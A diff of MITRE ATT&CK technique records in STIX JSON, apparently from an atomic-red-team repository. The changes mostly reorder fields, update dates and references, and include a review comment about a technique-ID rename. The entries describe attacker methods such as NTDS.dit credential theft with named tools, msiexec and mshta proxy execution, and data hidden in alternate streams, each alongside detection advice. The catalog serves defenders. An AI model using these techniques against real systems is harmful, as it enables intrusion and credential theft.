- "Windows"
- ]
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Process command-line parameters",
+ "Process monitoring"
+ ],
+ "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.\n\nMonitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious",
+ "x_mitre_defense_bypassed": [
+ "Application control",
+ "Digital Certificate Validation"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
+ "created": "2020-01-24T14:38:49.266Z",
+ "modified": "2020-06-20T22:38:14.154Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "type": "attack-pattern",
"id": "attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336",
- "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft.\n\nAdversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application whitelisting solutions that do not account for its potential abuse.",
+ "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft.\n\nAdversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse.",
"name": "Msiexec",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -16312,32 +16947,23 @@
"description": "Co, M. and Sison, G. (2018, February 8). Attack Using Windows Installer msiexec.exe leads to LokiBot. Retrieved April 18, 2019."
}
],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "defense-evasion"
- }
+ "x_mitre_platforms": [
+ "Windows"
],
- "modified": "2020-03-29T16:31:56.086Z",
- "created": "2020-01-24T14:38:49.266Z",
+ "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of msiexec.exe. Compare recent invocations of msiexec.exe with prior history of known good arguments and executed MSI files or DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of msiexec.exe may also be useful in determining the origin and purpose of the MSI files or DLLs being executed.",
+ "x_mitre_defense_bypassed": [
+ "Digital Certificate Validation",
+ "Application control"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
"x_mitre_data_sources": [
"DLL monitoring",
"Process command-line parameters",
"Process monitoring"
- ],
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_defense_bypassed": [
- "Digital Certificate Validation",
- "Application whitelisting"
- ],
- "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of msiexec.exe. Compare recent invocations of msiexec.exe with prior history of known good arguments and executed MSI files or DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of msiexec.exe may also be useful in determining the origin and purpose of the MSI files or DLLs being executed.",
- "x_mitre_platforms": [
- "Windows"
]
},
{
@@ -16362,15 +16988,10 @@
"phase_name": "command-and-control"
}
],
- "modified": "2019-06-21T14:45:42.314Z",
+ "modified": "2020-07-14T19:43:38.181Z",
"created": "2017-05-31T21:31:15.935Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_network_requirements": true,
- "x_mitre_detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure. Relating subsequent actions that may result from Discovery of the system and network information or Lateral Movement to the originating process may also yield useful data.",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "1.0",
"x_mitre_data_sources": [
"Netflow/Enclave netflow",
"Network device logs",
@@ -16378,7 +16999,13 @@
"Packet capture",
"Process use of network"
],
- "x_mitre_version": "1.0"
+ "x_mitre_detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure. Relating subsequent actions that may result from Discovery of the system and network information or Lateral Movement to the originating process may also yield useful data.",
+ "x_mitre_network_requirements": true,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--7d751199-05fa-4a72-920f-85df4506c76c",
@@ -16419,18 +17046,18 @@
],
"modified": "2020-03-14T23:23:41.770Z",
"created": "2020-03-14T23:23:41.770Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "When observing use of Multi-hop proxies, network data from the actual command and control servers could allow correlating incoming and outgoing flows to trace malicious traffic back to its source. Multi-hop proxies can also be detected by alerting on traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure that uses this technique.",
"x_mitre_data_sources": [
"Network protocol analysis",
"Netflow/Enclave netflow"
],
- "x_mitre_detection": "When observing use of Multi-hop proxies, network data from the actual command and control servers could allow correlating incoming and outgoing flows to trace malicious traffic back to its source. Multi-hop proxies can also be detected by alerting on traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure that uses this technique.",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--99709758-2b96-48f2-a68a-ad7fbd828091",
@@ -16461,7 +17088,15 @@
],
"modified": "2020-03-30T13:59:11.272Z",
"created": "2017-05-31T21:30:32.259Z",
- "x_mitre_version": "1.0",
+ "x_mitre_deprecated": true,
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "x_mitre_network_requirements": true,
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) Correlating alerts between multiple communication channels can further help identify command-and-control behavior.",
"x_mitre_data_sources": [
"Packet capture",
"Netflow/Enclave netflow",
@@ -16469,15 +17104,7 @@
"Malware reverse engineering",
"Process monitoring"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) Correlating alerts between multiple communication channels can further help identify command-and-control behavior.",
- "x_mitre_network_requirements": true,
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_is_subtechnique": false,
- "x_mitre_deprecated": true
+ "x_mitre_version": "1.0"
},
{
"id": "attack-pattern--428ca9f8-0e33-442a-be87-f869cb4cf73e",
@@ -16515,6 +17142,15 @@
"created": "2017-05-31T21:31:01.315Z"
},
{
+ "created": "2020-02-11T18:42:35.572Z",
+ "modified": "2020-03-24T20:39:39.949Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "credential-access"
+ }
+ ],
+ "type": "attack-pattern",
"id": "attack-pattern--edf91964-b26e-4b4a-9600-ccacd7d7df24",
"description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\\NTDS\\Ntds.dit of a domain controller.(Citation: Wikipedia Active Directory)\n\nIn addition to looking NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015)\n\nThe following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.\n\n* Volume Shadow Copy\n* secretsdump.py\n* Using the in-built Windows tool, ntdsutil.exe\n* Invoke-NinjaCopy\n",
"name": "NTDS",
@@ -16539,21 +17175,13 @@
"source_name": "Metcalf 2015"
}
],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "credential-access"
- }
+ "x_mitre_platforms": [
+ "Windows"
],
- "modified": "2020-03-24T20:39:39.949Z",
- "created": "2020-02-11T18:42:35.572Z",
- "x_mitre_contributors": [
- "Ed Williams, Trustwave, SpiderLabs"
- ],
- "x_mitre_detection": "Monitor processes and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the NTDS.dit.",
- "x_mitre_system_requirements": [
- "Access to Domain Controller or backup"
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_permissions_required": [
+ "Administrator"
],
"x_mitre_data_sources": [
"Windows event logs",
@@ -16561,13 +17189,12 @@
"PowerShell logs",
"Process monitoring"
],
- "x_mitre_permissions_required": [
- "Administrator"
+ "x_mitre_system_requirements": [
+ "Access to Domain Controller or backup"
],
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_detection": "Monitor processes and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the NTDS.dit.",
+ "x_mitre_contributors": [
+ "Ed Williams, Trustwave, SpiderLabs"
]
},
{
@@ -16699,35 +17326,35 @@
],
"modified": "2020-03-29T22:46:56.308Z",
"created": "2020-03-13T20:33:00.009Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Oddvar Moe, @oddvarmoe",
+ "Red Canary"
],
- "x_mitre_data_sources": [
- "Process command-line parameters",
- "API monitoring",
- "File monitoring"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_system_requirements": [
+ "NTFS partitioned hard drive"
],
- "x_mitre_detection": "Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA) Monitor calls to the ZwSetEaFile and ZwQueryEaFile Windows API functions as well as binaries used to interact with EA, (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) and consider regularly scanning for the presence of modified information. (Citation: SpectorOps Host-Based Jul 2017)\n\nThere are many ways to create and interact with ADSs using Windows utilities. Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: file.ext:ads[.ext]) is commonly associated with ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) For a more exhaustive list of utilities that can be used to execute and create ADSs, see https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f.\n\nThe Streams tool of Sysinternals can be used to uncover files with ADSs. The dir /r command can also be used to display ADSs. (Citation: Symantec ADS May 2009) Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a -stream parameter to interact with ADSs. (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)",
"x_mitre_defense_bypassed": [
"Anti-virus",
"Host forensic analysis",
"Signature-based detection"
],
- "x_mitre_system_requirements": [
- "NTFS partitioned hard drive"
+ "x_mitre_detection": "Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA) Monitor calls to the ZwSetEaFile and ZwQueryEaFile Windows API functions as well as binaries used to interact with EA, (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) and consider regularly scanning for the presence of modified information. (Citation: SpectorOps Host-Based Jul 2017)\n\nThere are many ways to create and interact with ADSs using Windows utilities. Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: file.ext:ads[.ext]) is commonly associated with ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) For a more exhaustive list of utilities that can be used to execute and create ADSs, see https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f.\n\nThe Streams tool of Sysinternals can be used to uncover files with ADSs. The dir /r command can also be used to display ADSs. (Citation: Symantec ADS May 2009) Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a -stream parameter to interact with ADSs. (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)",
+ "x_mitre_data_sources": [
+ "Process command-line parameters",
+ "API monitoring",
+ "File monitoring"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_contributors": [
- "Oddvar Moe, @oddvarmoe",
- "Red Canary"
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
"id": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Native API",
- "description": "Adversaries may interact with the native Windows application programming interface (API) to execute behaviors. Similar to the system call interface on UNIX systems, the Windows native API provides a controlled means to calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes. The native API is leveraged by the OS during system boot (when other system components are not yet initialized) but is also exposed to user-mode applications via ntdll.dll and ntoskrnl.exe.(Citation: Microsoft NativeAPI)\n\nFunctionality provided by the native API is also available via the Windows API, which provides a documented programming interface. For example, functions such as the Windows API CreateProcess will allow programs and scripts to start other processes with proper path and argument parameters.(Citation: Microsoft CreateProcess) This allows API callers to execute a binary, run a CLI command, load modules, etc. Thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)\n\nOther software frameworks, such as Microsoft .NET, are also available to interact with the native API. These frameworks typically provide wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)\n\nAdversaries may abuse the native API as a means of execution. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API, and its hierarchy of interfaces, provide mechanisms to interact with and utilize a victimized system. ",
+ "description": "Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\n\nFunctionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)\n\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)\n\nAdversaries may abuse these native API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system.",
"external_references": [
{
"source_name": "mitre-attack",
@@ -16735,24 +17362,59 @@
"url": "https://attack.mitre.org/techniques/T1106"
},
{
- "source_name": "Microsoft NativeAPI",
- "url": "https://social.technet.microsoft.com/wiki/contents/articles/11831.the-windows-native-api.aspx",
- "description": "Bruno, L. (2013, July 30). The Windows Native API. Retrieved March 15, 2020."
+ "source_name": "NT API Windows",
+ "url": "https://undocumented.ntinternals.net/",
+ "description": "The NTinterlnals.net team. (n.d.). Nowak, T. Retrieved June 25, 2020."
+ },
+ {
+ "source_name": "Linux Kernel API",
+ "url": "https://www.kernel.org/doc/html/v4.12/core-api/kernel-api.html",
+ "description": "Linux Kernel Organization, Inc. (n.d.). The Linux Kernel API. Retrieved June 25, 2020."
},
{
"url": "http://msdn.microsoft.com/en-us/library/ms682425",
"description": "Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014.",
"source_name": "Microsoft CreateProcess"
},
+ {
+ "source_name": "GNU Fork",
+ "url": "https://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.html",
+ "description": "Free Software Foundation, Inc.. (2020, June 18). Creating a Process. Retrieved June 25, 2020."
+ },
{
"source_name": "Microsoft Win32",
"url": "https://docs.microsoft.com/en-us/windows/win32/api/",
"description": "Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved March 15, 2020."
},
+ {
+ "source_name": "LIBC",
+ "url": "https://man7.org/linux/man-pages//man7/libc.7.html",
+ "description": "Kerrisk, M. (2016, December 12). libc(7) \u2014 Linux manual page. Retrieved June 25, 2020."
+ },
+ {
+ "source_name": "GLIBC",
+ "url": "https://www.gnu.org/software/libc/",
+ "description": "glibc developer community. (2020, February 1). The GNU C Library (glibc). Retrieved June 25, 2020."
+ },
{
"source_name": "Microsoft NET",
"url": "https://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-framework",
"description": "Microsoft. (n.d.). What is .NET Framework?. Retrieved March 15, 2020."
+ },
+ {
+ "source_name": "Apple Core Services",
+ "url": "https://developer.apple.com/documentation/coreservices",
+ "description": "Apple. (n.d.). Core Services. Retrieved June 25, 2020."
+ },
+ {
+ "source_name": "MACOS Cocoa",
+ "url": "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html#//apple_ref/doc/uid/TP40001067-CH274-SW1",
+ "description": "Apple. (2015, September 16). Cocoa Application Layer. Retrieved June 25, 2020."
+ },
+ {
+ "source_name": "macOS Foundation",
+ "url": "https://developer.apple.com/documentation/foundation",
+ "description": "Apple. (n.d.). Foundation. Retrieved July 1, 2020."
}
],
"object_marking_refs": [
@@ -16765,26 +17427,29 @@
"phase_name": "execution"
}
],
- "modified": "2020-03-15T15:52:05.227Z",
+ "modified": "2020-07-01T16:19:54.646Z",
"created": "2017-05-31T21:31:17.472Z",
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "2.0",
- "x_mitre_contributors": [
- "Stefan Kanthak"
+ "x_mitre_platforms": [
+ "Windows",
+ "macOS",
+ "Linux"
],
+ "x_mitre_remote_support": false,
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient. \n\nUtilization of the Windows API may involve processes loading/accessing system DLLs associated with providing called functions (ex: kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity. ",
"x_mitre_data_sources": [
+ "System calls",
"Loaded DLLs",
"API monitoring",
"Process monitoring"
],
- "x_mitre_detection": "Monitoring native and Windows API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of Windows API functions such as CreateProcess are common and difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient. \n\nUtilization of the Windows API may involve processes loading/accessing system DLLs associated with providing called functions (ex: kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity. ",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_contributors": [
+ "Stefan Kanthak"
],
- "x_mitre_remote_support": false,
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "2.0",
+ "x_mitre_is_subtechnique": false
},
{
"id": "attack-pattern--bb0e0cb5-f3e4-4118-a4cb-6bf13bfbc9f2",
@@ -16859,25 +17524,25 @@
],
"modified": "2020-03-24T18:28:07.793Z",
"created": "2020-01-24T14:26:51.207Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_contributors": [
- "Matthew Demaske, Adaptforward"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM"
],
+ "x_mitre_detection": "It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\\SOFTWARE\\Microsoft\\Netsh registry key for any new or suspicious entries that do not correlate with known system files or benign software. (Citation: Demaske Netsh Persistence)",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"Windows Registry",
"DLL monitoring"
],
- "x_mitre_detection": "It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\\SOFTWARE\\Microsoft\\Netsh registry key for any new or suspicious entries that do not correlate with known system files or benign software. (Citation: Demaske Netsh Persistence)",
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM"
+ "x_mitre_contributors": [
+ "Matthew Demaske, Adaptforward"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -16923,6 +17588,19 @@
],
"modified": "2020-03-29T01:11:28.903Z",
"created": "2019-04-17T20:23:15.105Z",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_detection": "Detection of Network DoS can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an Network DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.",
+ "x_mitre_data_sources": [
+ "Sensor health and status",
+ "Network protocol analysis",
+ "Netflow/Enclave netflow",
+ "Network intrusion detection system",
+ "Network device logs"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_impact_type": [
+ "Availability"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -16933,20 +17611,7 @@
"SaaS",
"Azure",
"Office 365"
- ],
- "x_mitre_impact_type": [
- "Availability"
- ],
- "x_mitre_version": "1.0",
- "x_mitre_data_sources": [
- "Sensor health and status",
- "Network protocol analysis",
- "Netflow/Enclave netflow",
- "Network intrusion detection system",
- "Network device logs"
- ],
- "x_mitre_detection": "Detection of Network DoS can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an Network DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.",
- "x_mitre_is_subtechnique": false
+ ]
},
{
"external_references": [
@@ -16981,21 +17646,31 @@
],
"modified": "2020-03-24T23:45:25.625Z",
"created": "2020-01-10T18:01:03.666Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.",
"x_mitre_data_sources": [
"Process monitoring",
"File monitoring"
],
- "x_mitre_detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2017-05-31T21:30:43.915Z",
+ "modified": "2020-03-11T19:55:53.828Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "discovery"
+ }
],
+ "type": "attack-pattern",
+ "id": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Network Service Scanning",
+ "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. \n\nWithin cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.",
"external_references": [
{
"source_name": "mitre-attack",
@@ -17008,19 +17683,9 @@
"url": "https://capec.mitre.org/data/definitions/300.html"
}
],
- "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. \n\nWithin cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.",
- "name": "Network Service Scanning",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "discovery"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-11T19:55:53.828Z",
- "created": "2017-05-31T21:30:43.915Z",
"x_mitre_platforms": [
"Linux",
"Windows",
@@ -17072,8 +17737,8 @@
"external_references": [
{
"source_name": "mitre-attack",
- "external_id": "T1551.005",
- "url": "https://attack.mitre.org/techniques/T1551/005"
+ "external_id": "T1070.005",
+ "url": "https://attack.mitre.org/techniques/T1070/005"
},
{
"url": "https://technet.microsoft.com/bb490717.aspx",
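Review bot: Anything in this repository still keyed on `T1551.005` will stop matching this object after this hunk, since the `external_id` and `url` on the new side now read `T1070.005` while nothing visible in the commit carries a corresponding update to consumers of the old identifier. If atomic test directories, mapping tables or indexes are looked up by `external_id` (likely, given the `atomic_red_team/` path, but not shown here), the commit should include that rename or state in its description that `T1551.005` must be remapped to `T1070.005`. The enclosing `attack-pattern` object starts and ends outside the hunk.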
@@ -17097,28 +17762,28 @@
],
"modified": "2020-01-31T12:39:18.816Z",
"created": "2020-01-31T12:39:18.816Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_system_requirements": [
+ "Established network share connection to a remote system. Level of access depends on permissions of the account used."
],
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
+ ],
+ "x_mitre_defense_bypassed": [
+ "Host forensic analysis"
+ ],
+ "x_mitre_detection": "Network share connections may be common depending on how an network environment is used. Monitor command-line invocation of net use commands associated with establishing and removing remote shares over SMB, including following best practices for detection of [Windows Admin Shares](https://attack.mitre.org/techniques/T1077). SMB traffic between systems may also be captured and decoded to look for related network share session and file transfer activity. Windows authentication logs are also useful in determining when authenticated network shares are established and by which account, and can be used to correlate network share activity to other events to investigate potentially malicious activity.",
"x_mitre_data_sources": [
"Authentication logs",
"Packet capture",
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_detection": "Network share connections may be common depending on how an network environment is used. Monitor command-line invocation of net use commands associated with establishing and removing remote shares over SMB, including following best practices for detection of [Windows Admin Shares](https://attack.mitre.org/techniques/T1077). SMB traffic between systems may also be captured and decoded to look for related network share session and file transfer activity. Windows authentication logs are also useful in determining when authenticated network shares are established and by which account, and can be used to correlate network share activity to other events to investigate potentially malicious activity.",
- "x_mitre_defense_bypassed": [
- "Host forensic analysis"
- ],
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
- ],
- "x_mitre_system_requirements": [
- "Established network share connection to a remote system. Level of access depends on permissions of the account used."
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f",
@@ -17169,14 +17834,13 @@
],
"modified": "2020-03-15T00:59:10.149Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_version": "2.1",
- "x_mitre_data_sources": [
- "Process monitoring",
- "Process command-line parameters",
- "Network protocol analysis",
- "Process use of network"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_contributors": [
+ "Praetorian"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
],
